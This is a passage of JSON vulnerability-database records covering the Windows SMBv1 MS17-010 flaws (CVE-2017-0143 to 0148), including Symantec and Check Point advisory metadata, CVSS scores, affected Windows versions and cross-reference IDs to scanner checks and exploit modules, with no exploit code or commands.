"exploitdb"}, {"idList": ["1337DAY-ID-27786", "1337DAY-ID-27752", "1337DAY-ID-33313", "1337DAY-ID-33895", "1337DAY-ID-27613", "1337DAY-ID-29702"], "type": "zdt"}, {"idList": ["PACKETSTORM:146236", "PACKETSTORM:154690", "PACKETSTORM:142181", "PACKETSTORM:142548", "PACKETSTORM:156196"], "type": "packetstorm"}, {"idList": ["MS:CVE-2017-0146"], "type": "mscve"}, {"idList": ["TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546", "TRENDMICROBLOG:7E6831E46F8BB1882B752045F527ABE6"], "type": "trendmicroblog"}, {"idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810", "OPENVAS:1361412562310810698"], "type": "openvas"}, {"idList": ["KLA11902", "KLA10977", "KLA10979"], "type": "kaspersky"}, {"idList": ["F5:K57181937"], "type": "f5"}, {"idList": ["MS17-010.NASL", "SMB_NT_MS17-010.NASL"], "type": "nessus"}, {"idList": ["MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:ILITIES/MSFT-CVE-2017-0146/", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE"], "type": "metasploit"}, {"idList": ["HUAWEI-SA-20170513-01-WINDOWS"], "type": "huawei"}, {"idList": ["CVE-2017-0146"], "type": "cve"}], "rev": 2}, "score": {"modified": "2018-03-12T16:12:10", "rev": 2, "value": 9.4, "vector": "NONE"}}, "hash": "41b3a29610ed25da2ec07a6c2dbc02f8d901e510cf4db130fcba0c783f5f67be", "hashmap": [{"hash": "0ceb24f9631084ba620bf1a65ce8dd09", "key": "affectedSoftware"}, {"hash": "cde40a13c5d43ca610b08893c2bdb748", "key": "cvelist"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "immutableFields"}, {"hash": "2076413bdcb42307d016f5286cbae795", "key": "cvss"}, {"hash": "52ac1b70370c64e0d47bc24ef31b807b", "key": "href"}, {"hash": "b8d2e9770277e4a8198efeee8a25dfbc", "key": "modified"}, {"hash": 
"dee2d346525c42556b1833b21cb142d8", "key": "_object_types"}, {"hash": "ae9f420b26fd277e3efcc881d7d236ae", "key": "description"}, {"hash": "52e3bbafc627009ac13caff1200a0dbf", "key": "type"}, {"hash": "f9fa10ba956cacf91d7878861139efb9", "key": "bulletinFamily"}, {"hash": "b5c29791cd9e61202953bd2641d4e401", "key": "title"}, {"hash": "38af5596de2fce76e4eb62aa066bbcdb", "key": "_object_type"}, {"hash": "b8d2e9770277e4a8198efeee8a25dfbc", "key": "published"}, {"hash": "12432522d29cb6b9b409867cd87e588e", "key": "references"}, {"hash": "d6218597dc7a1b025a781373296b2b63", "key": "reporter"}], "history": [], "href": "https://www.symantec.com/content/symantec/english/en/security-center/vulnerabilities/writeup.html/96707", "id": "SMNTC-96707", "immutableFields": [], "lastseen": "2018-03-12T16:12:10", "modified": "2017-03-14T00:00:00", "objectVersion": "1.5", "published": "2017-03-14T00:00:00", "references": ["https://support.microsoft.com/en-in/help/4013389/title", "https://support.microsoft.com/en-in/help/4012598/title", "https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/", "https://www.wired.com/beyond-the-beyond/2017/04/double-pulsar-nsa-leaked-hacks-wild/"], "reporter": "Symantec Security Response", "title": "Microsoft Windows SMB Server CVE-2017-0146 Remote Code Execution Vulnerability", "type": "symantec", "viewCount": 323}, "different_elements": ["affectedSoftware"], "edition": 1, "lastseen": "2018-03-12T16:12:10"}], "viewCount": 357, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0146"]}, {"type": "metasploit", "idList": ["MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:ILITIES/MSFT-CVE-2017-0146/", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010"]}, {"type": 
"seebug", "idList": ["SSV:92952", "SSV:92964"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2017-0203"]}, {"type": "saint", "idList": ["SAINT:8F97D6443E5FED252FF64CE37A74709D", "SAINT:2D677AA07C3BC24D8037E937830ACA0D"]}, {"type": "mscve", "idList": ["MS:CVE-2017-0146"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810698", "OPENVAS:1361412562310810810", "OPENVAS:1361412562310810676"]}, {"type": "canvas", "idList": ["MS17_010"]}, {"type": "threatpost", "idList": ["THREATPOST:758CC5987A361EA1BB8BBFFC425334D5"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:142181", "PACKETSTORM:154690", "PACKETSTORM:156196", "PACKETSTORM:146236", "PACKETSTORM:142548"]}, {"type": "exploitdb", "idList": ["EDB-ID:41987", "EDB-ID:47456", "EDB-ID:43970", "EDB-ID:41891"]}, {"type": "zdt", "idList": ["1337DAY-ID-33895", "1337DAY-ID-27613", "1337DAY-ID-29702", "1337DAY-ID-27752", "1337DAY-ID-33313", "1337DAY-ID-27786"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:B891CB6093D217510DB7327088AE7FB2"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546", "TRENDMICROBLOG:7E6831E46F8BB1882B752045F527ABE6"]}, {"type": "attackerkb", "idList": ["AKB:D476227F-C4B1-49E3-9947-897077E5150D", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "mskb", "idList": ["KB4013389"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "nessus", "idList": ["SMB_NT_MS17-010.NASL", "700099.PRM", "700059.PRM", "MS17-010.NASL"]}, {"type": "kaspersky", "idList": ["KLA11902", "KLA10979", "KLA10977"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", 
"RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820"]}, {"type": "ics", "idList": ["ICSMA-18-058-02"]}], "modified": "2021-06-08T19:05:22", "rev": 2}, "score": {"value": 9.4, "vector": "NONE", "modified": "2021-06-08T19:05:22", "rev": 2}}, "objectVersion": "1.5", "affectedSoftware": [{"name": "unify openstage xpert", "operator": "eq", "version": "6010p 5 "}, {"name": "microsoft windows", "operator": "eq", "version": "8.1 for 32-bit Systems "}, {"name": "microsoft windows", "operator": "eq", "version": "7 for x64-based Systems SP1 "}, {"name": "microsoft windows", "operator": "eq", "version": "10 Version 1607 for 32-bit Systems "}, {"name": "microsoft windows vista x64 edition service pack", "operator": "eq", "version": "2 "}, {"name": "microsoft windows", "operator": "eq", "version": "7 for 32-bit Systems SP1 "}, {"name": "microsoft windows", "operator": "eq", "version": "8 X64 "}, {"name": "microsoft windows server", "operator": "eq", "version": "2008 for 32-bit Systems SP2 "}, {"name": "microsoft windows server", "operator": "eq", "version": "2012 R2 "}, {"name": "microsoft windows", "operator": "eq", "version": "10 Version 1607 for x64-based Systems "}, {"name": "microsoft windows", "operator": "eq", "version": "10 for x64-based Systems "}, {"name": "microsoft windows server", "operator": "eq", "version": "2003 x86 SP2 "}, {"name": "microsoft windows server", "operator": "eq", "version": "2012 "}, {"name": "microsoft windows", "operator": "eq", "version": "10 version 1511 for 32-bit Systems "}, {"name": "microsoft windows", "operator": "eq", "version": "8.1 for x64-based Systems "}, {"name": "microsoft windows server", "operator": "eq", "version": "2008 R2 for x64-based Systems SP1 "}, {"name": "microsoft windows server", "operator": "eq", "version": "2003 x64 SP2 "}, {"name": "microsoft windows server", "operator": "eq", "version": "2008 R2 for Itanium-based 
Systems SP1 "}, {"name": "unify openstage xpert", "operator": "eq", "version": "6010p 5R1 "}, {"name": "microsoft windows server", "operator": "eq", "version": "2008 for x64-based Systems SP2 "}, {"name": "microsoft windows rt", "operator": "eq", "version": "8.1 "}, {"name": "microsoft windows server", "operator": "eq", "version": "2008 for Itanium-based Systems SP2 "}, {"name": "microsoft windows", "operator": "eq", "version": "10 version 1511 for x64-based Systems "}, {"name": "microsoft windows", "operator": "eq", "version": "8 X86 "}, {"name": "microsoft windows vista service pack", "operator": "eq", "version": "2 "}, {"name": "microsoft windows", "operator": "eq", "version": "10 for 32-bit Systems "}], "_object_type": "robots.models.symantec.SymantecBulletin", "_object_types": ["robots.models.base.Bulletin", "robots.models.symantec.SymantecBulletin"], "immutableFields": [], "edition": 2, "hashmap": [{"key": "_object_type", "hash": "38af5596de2fce76e4eb62aa066bbcdb"}, {"key": "_object_types", "hash": "dee2d346525c42556b1833b21cb142d8"}, {"key": "affectedSoftware", "hash": "c74a882435f0574ba322c965844414a4"}, {"key": "bulletinFamily", "hash": "f9fa10ba956cacf91d7878861139efb9"}, {"key": "cvelist", "hash": "cde40a13c5d43ca610b08893c2bdb748"}, {"key": "cvss", "hash": "2076413bdcb42307d016f5286cbae795"}, {"key": "description", "hash": "ae9f420b26fd277e3efcc881d7d236ae"}, {"key": "href", "hash": "52ac1b70370c64e0d47bc24ef31b807b"}, {"key": "immutableFields", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "modified", "hash": "b8d2e9770277e4a8198efeee8a25dfbc"}, {"key": "published", "hash": "b8d2e9770277e4a8198efeee8a25dfbc"}, {"key": "references", "hash": "12432522d29cb6b9b409867cd87e588e"}, {"key": "reporter", "hash": "d6218597dc7a1b025a781373296b2b63"}, {"key": "title", "hash": "b5c29791cd9e61202953bd2641d4e401"}, {"key": "type", "hash": "52e3bbafc627009ac13caff1200a0dbf"}], "scheme": null, "cvss2": {}, "cvss3": {}}], "checkpoint_advisories": [{"id": 
"CPAI-2017-0419", "vendorId": null, "hash": "95d1a0c8b50ed0b6ba08d3b76da244a6", "type": "checkpoint_advisories", "bulletinFamily": "info", "title": "Microsoft Windows SMB Remote Code Execution (MS17-010: CVE-2017-0148)", "description": "An information disclosure vulnerability exists in the SMBv1 component of Microsoft Windows SMB server. The vulnerability is due to improper handling of SMBv1 requests. A remote, unauthenticated attacker could exploit this vulnerability by sending crafted SMBv1 messages to a target server. Successful exploitation could result in the disclosure of sensitive information from the target server.", "published": "2017-05-16T00:00:00", "modified": "2017-05-16T00:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "", "reporter": "Check Point Advisories", "references": [], "cvelist": ["CVE-2017-0148"], "immutableFields": [], "lastseen": "2021-11-02T03:31:00", "history": [], "viewCount": 0, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0148"]}, {"type": "symantec", "idList": 
["SMNTC-96706"]}, {"type": "thn", "idList": ["THN:18A54BDD63D7DC2B3284D326E6510150"]}, {"type": "mskb", "idList": ["KB4012598", "KB4013389"]}, {"type": "mscve", "idList": ["MS:CVE-2017-0148"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:7F979181993247D214BE9DB570C22482", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:CE638F8710DF0090997AF6FB196E2595", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "attackerkb", "idList": ["AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:D476227F-C4B1-49E3-9947-897077E5150D"]}, {"type": "zdt", "idList": ["1337DAY-ID-33313", "1337DAY-ID-27786", "1337DAY-ID-33895", "1337DAY-ID-27613", "1337DAY-ID-27752"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:142548", "PACKETSTORM:154690", "PACKETSTORM:142181", "PACKETSTORM:156196"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010"]}, {"type": "nessus", "idList": ["MS17-010.NASL", "700059.PRM", "700099.PRM", "SMB_NT_MS17-010.NASL"]}, {"type": "exploitdb", "idList": ["EDB-ID:41987", "EDB-ID:47456", "EDB-ID:41891"]}, {"type": "kaspersky", "idList": ["KLA10977", "KLA11902", "KLA10979"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "ics", "idList": ["ICSMA-18-058-02"]}], "modified": "2021-11-02T03:31:00", "rev": 
2}, "score": {"value": 6.6, "vector": "NONE", "modified": "2021-11-02T03:31:00", "rev": 2}}, "objectVersion": "1.6", "severity": "Critical", "protected_by": ["Security Gateway R80", "Security Gateway R77", "Security Gateway R75"], "vulnerable_products": ["Windows Vista", "Windows Server 2008", "Windows 7", "Windows Server 2008 R2", "Windows 8.1", "Windows Server 2012", "Windows Server 2012 R2", "Windows RT 8.1", "Windows 10", "Windows Server 2016"], "_object_type": "robots.models.checkpoint.CheckpointAdvisoryBulletin", "_object_types": ["robots.models.checkpoint.CheckpointAdvisoryBulletin", "robots.models.base.Bulletin"]}, {"id": "CPAI-2017-0177", "vendorId": null, "hash": "e24bc6cf789f730909a90d9d3667eecf", "type": "checkpoint_advisories", "bulletinFamily": "info", "title": "Microsoft Windows SMB Remote Code Execution (MS17-010: CVE-2017-0143)", "description": "A remote code execution vulnerability exist in Microsoft Server Message Block 1.0 (SMBv1). The vulnerability is due to the way SMBv1 service handles certain requests. 
An attacker who successfully exploited the vulnerability could gain code execution on the target server.", "published": "2017-03-14T00:00:00", "modified": "2017-11-26T00:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "", "reporter": "Check Point Advisories", "references": [], "cvelist": ["CVE-2017-0143"], "immutableFields": [], "lastseen": "2021-11-01T23:25:45", "history": [], "viewCount": 0, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0143"]}, {"type": "attackerkb", "idList": ["AKB:400EDB06-73BF-4A6D-A113-643077965C7B", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:D476227F-C4B1-49E3-9947-897077E5150D"]}, {"type": "symantec", "idList": ["SMNTC-96703"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786371"]}, {"type": "mscve", "idList": ["MS:CVE-2017-0143"]}, {"type": "talosblog", "idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}, {"type": "thn", "idList": ["THN:BC214880895281474C1A8EF7B7D98C13", "THN:F12E2167FDA829ED32C7A16A83B048BF", "THN:C50AC2400E56ED88DBA7FC6DAC8360A8"]}, {"type": 
"threatpost", "idList": ["THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:7E66A86C86BE8481D1B905B183CA42C3", "THREATPOST:7D1D823549046978FD52257C68DF7801", "THREATPOST:43C3E019D454987EF522E299C31E9D3F"]}, {"type": "saint", "idList": ["SAINT:DAEC4BA69103823E03C8F3C832C5B41D", "SAINT:BD676E3751A4D110EAA275BF92CA7E46"]}, {"type": "canvas", "idList": ["MS17_010", "ETERNALBLUE"]}, {"type": "nmap", "idList": ["NMAP:SMB-VULN-MS17-010.NSE"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}, {"type": "exploitdb", "idList": ["EDB-ID:41987", "EDB-ID:47456", "EDB-ID:41891", "EDB-ID:43970"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:146236", "PACKETSTORM:142548", "PACKETSTORM:142181", "PACKETSTORM:154690", "PACKETSTORM:156196"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010"]}, {"type": "zdt", "idList": ["1337DAY-ID-33313", "1337DAY-ID-27786", "1337DAY-ID-33895", "1337DAY-ID-27613", "1337DAY-ID-29702", "1337DAY-ID-27752"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "nessus", "idList": ["MS17-010.NASL", 
"700059.PRM", "700099.PRM", "SMB_NT_MS17-010.NASL"]}, {"type": "mskb", "idList": ["KB4013389"]}, {"type": "kaspersky", "idList": ["KLA10977", "KLA11902", "KLA10979"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "ics", "idList": ["ICSMA-20-170-01", "ICSMA-18-058-02"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:CD2337322AF45A03293696D535E4CBF8", "QUALYSBLOG:9BA334FCEF38374A0B09A0614B2D74D4"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546"]}], "modified": "2021-11-01T23:25:45", "rev": 2}, "score": {"value": 8.3, "vector": "NONE", "modified": "2021-11-01T23:25:45", "rev": 2}}, "objectVersion": "1.6", "severity": "Critical", "protected_by": ["Security Gateway R80", "Security Gateway R77", "Security Gateway R75"], "vulnerable_products": ["Windows Vista", "Windows Server 2008", "Windows 7", "Windows Server 2008 R2", "Windows 8.1", "Windows Server 2012", "Windows Server 2012 R2", "Windows RT 8.1", "Windows 10", "Windows Server 2016"], "_object_type": "robots.models.checkpoint.CheckpointAdvisoryBulletin", "_object_types": ["robots.models.base.Bulletin", "robots.models.checkpoint.CheckpointAdvisoryBulletin"]}, {"id": "CPAI-2017-0200", "vendorId": null, "hash": "ad76ea3a96eda4cabf6f3ae9c8382ad2", "type": "checkpoint_advisories", "bulletinFamily": "info", "title": "Microsoft Windows SMB Remote Code Execution (MS17-010: CVE-2017-0145)", "description": "A remote code execution vulnerability exist in Microsoft Server Message Block 1.0 (SMBv1). The vulnerability is due to the way SMBv1 service handles certain requests. 
An attacker who successfully exploited the vulnerability could gain code execution on the target server.", "published": "2017-03-14T00:00:00", "modified": "2017-04-20T00:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "", "reporter": "Check Point Advisories", "references": [], "cvelist": ["CVE-2017-0145"], "immutableFields": [], "lastseen": "2021-11-02T03:31:25", "history": [], "viewCount": 0, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0145"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:ILITIES/MSFT-CVE-2017-0145/", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE"]}, {"type": "symantec", "idList": ["SMNTC-96705"]}, {"type": "thn", "idList": ["THN:2E043D9BAC04DEE81005124DD54A31E2", "THN:FF56343C15BACA1C1CE83A105EFD7F77"]}, {"type": "mmpc", "idList": ["MMPC:FECB9309EE6D84976C56C12C05F1CD02", "MMPC:C211C70545FBDF88C2F99362DC4608A8", 
"MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:89789F73D15A0B331512F90F7E692851"]}, {"type": "threatpost", "idList": ["THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61", "THREATPOST:D6175B132FE6B7820E744D2387FE7D5D", "THREATPOST:302BC8714784E3B4BB7EC5CD2F81C1BA", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591"]}, {"type": "mscve", "idList": ["MS:CVE-2017-0145"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546", "TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "attackerkb", "idList": ["AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:D476227F-C4B1-49E3-9947-897077E5150D"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:156196", "PACKETSTORM:142548", "PACKETSTORM:142181", "PACKETSTORM:154690"]}, {"type": "zdt", "idList": ["1337DAY-ID-33895", "1337DAY-ID-27786", "1337DAY-ID-27752", "1337DAY-ID-33313", "1337DAY-ID-27613"]}, {"type": "nessus", "idList": ["700059.PRM", "SMB_NT_MS17-010.NASL", "700099.PRM", "MS17-010.NASL"]}, {"type": "kaspersky", "idList": ["KLA10979", "KLA11902", "KLA10977"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "exploitdb", "idList": ["EDB-ID:41891", "EDB-ID:41987", "EDB-ID:47456"]}, {"type": "mskb", "idList": ["KB4013389"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810810", "OPENVAS:1361412562310810676"]}, {"type": "f5", "idList": 
["F5:K57181937"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:CD2337322AF45A03293696D535E4CBF8"]}, {"type": "ics", "idList": ["ICSMA-18-058-02"]}], "modified": "2021-11-02T03:31:25", "rev": 2}, "score": {"value": 7.8, "vector": "NONE", "modified": "2021-11-02T03:31:25", "rev": 2}}, "objectVersion": "1.6", "severity": "Critical", "protected_by": ["Security Gateway R80", "Security Gateway R77", "Security Gateway R75"], "vulnerable_products": ["Windows Vista", "Windows Server 2008", "Windows 7", "Windows Server 2008 R2", "Windows 8.1", "Windows Server 2012", "Windows Server 2012 R2", "Windows RT 8.1", "Windows 10", "Windows Server 2016"], "_object_type": "robots.models.checkpoint.CheckpointAdvisoryBulletin", "_object_types": ["robots.models.checkpoint.CheckpointAdvisoryBulletin", "robots.models.base.Bulletin"]}, {"id": "CPAI-2017-0198", "vendorId": null, "hash": "704970fa03766cce3d06ec52134b4ee2", "type": "checkpoint_advisories", "bulletinFamily": "info", "title": "Microsoft Windows SMB Remote Code Execution (MS17-010: CVE-2017-0144)", "description": "A remote code execution vulnerability exists in Microsoft Server Message Block 1.0 (SMBv1). The vulnerability is due to the way the SMBv1 service handles certain requests. 
An attacker who successfully exploited the vulnerability could gain code execution on the target server.", "published": "2017-03-14T00:00:00", "modified": "2017-07-05T00:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, 